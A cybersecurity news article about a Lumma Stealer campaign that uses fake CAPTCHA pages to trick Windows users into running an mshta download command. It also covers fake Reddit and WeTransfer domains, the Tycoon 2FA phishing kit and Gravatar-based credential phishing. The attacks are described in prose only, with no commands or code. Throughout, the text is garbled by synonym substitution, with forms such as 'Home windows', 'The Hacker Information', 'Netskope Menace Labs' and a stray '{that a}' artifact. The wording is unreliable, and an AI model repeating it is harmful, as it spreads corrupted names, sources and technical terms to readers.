Cybersecurity researchers are calling consideration to a brand new malware marketing campaign that leverages pretend CAPTCHA verification checks to ship the notorious Lumma info stealer.
“The campaign is global, with Netskope Threat Labs tracking victims targeted in Argentina, Colombia, the United States, the Philippines, and other countries around the world,” Leandro Fróes, senior risk analysis engineer at Netskope Menace Labs, mentioned in a report shared with The Hacker Information.
“The campaign also spans multiple industries, including healthcare, banking, and marketing, with the telecom industry having the highest number of organizations targeted.”
The assault chain begins when a sufferer visits a compromised web site, which directs them to a bogus CAPTCHA web page that particularly instructs the positioning customer to repeat and paste a command into the Run immediate in Home windows that makes use of the native mshta.exe binary to obtain and execute an HTA file from a distant server.
It is price noting {that a} earlier iteration of this method, extensively referred to as ClickFix, concerned the execution of a Base64-encoded PowerShell script to set off the Lumma Stealer an infection.
The HTA file, in flip, executes a PowerShell command to launch a next-stage payload, a PowerShell script that unpacks a second PowerShell script accountable for decoding and loading the Lumma payload, however not earlier than taking steps to bypass the Home windows Antimalware Scan Interface (AMSI) in an effort to evade detection.
“By downloading and executing malware in such ways, the attacker avoids browser-based defenses since the victim will perform all of the necessary steps outside of the browser context,” Fróes defined.
“The Lumma Stealer operates using the malware-as-a-service (MaaS) model and has been extremely active in the past months. By using different delivery methods and payloads it makes detection and blocking of such threats more complex, especially when abusing user interactions within the system.”
As not too long ago as this month, Lumma has additionally been distributed through roughly 1,000 counterfeit domains impersonating Reddit and WeTransfer that redirect customers to obtain password-protected archives.
These archive recordsdata include an AutoIT dropper dubbed SelfAU3 Dropper that subsequently executes the stealer, in accordance to Sekoia researcher crep1x. In early 2023, risk actors leveraged an analogous approach to spin up over 1,300 domains masquerading as AnyDesk in an effort to push the Vidar Stealer malware.
The event comes as Barracuda Networks detailed an up to date model of the Phishing-as-a-Service (PhaaS) toolkit referred to as Tycoon 2FA that features superior options to “obstruct, derail, and otherwise thwart attempts by security tools to confirm its malicious intent and inspect its web pages.”
These embrace using reliable — presumably compromised — electronic mail accounts to ship phishing emails and taking a collection of steps to forestall evaluation by detecting automated safety scripts, listening for keystrokes that counsel net inspection, and disabling the right-click context menu.
Social engineering-oriented credential harvesting assaults have additionally been noticed leveraging avatar supplier Gravatar to imitate numerous reliable companies like AT&T, Comcast, Eastlink, Infinity, Kojeko, and Proton Mail.
“By exploiting Gravatar’s ‘Profiles as a Service,’ attackers create convincing fake profiles that mimic legitimate services, tricking users into divulging their credentials,” SlashNext Discipline CTO Stephen Kowski mentioned.
“Instead of generic phishing attempts, attackers tailor their fake profiles to resemble the legitimate services they’re mimicking closely through services that are not often known or protected.”
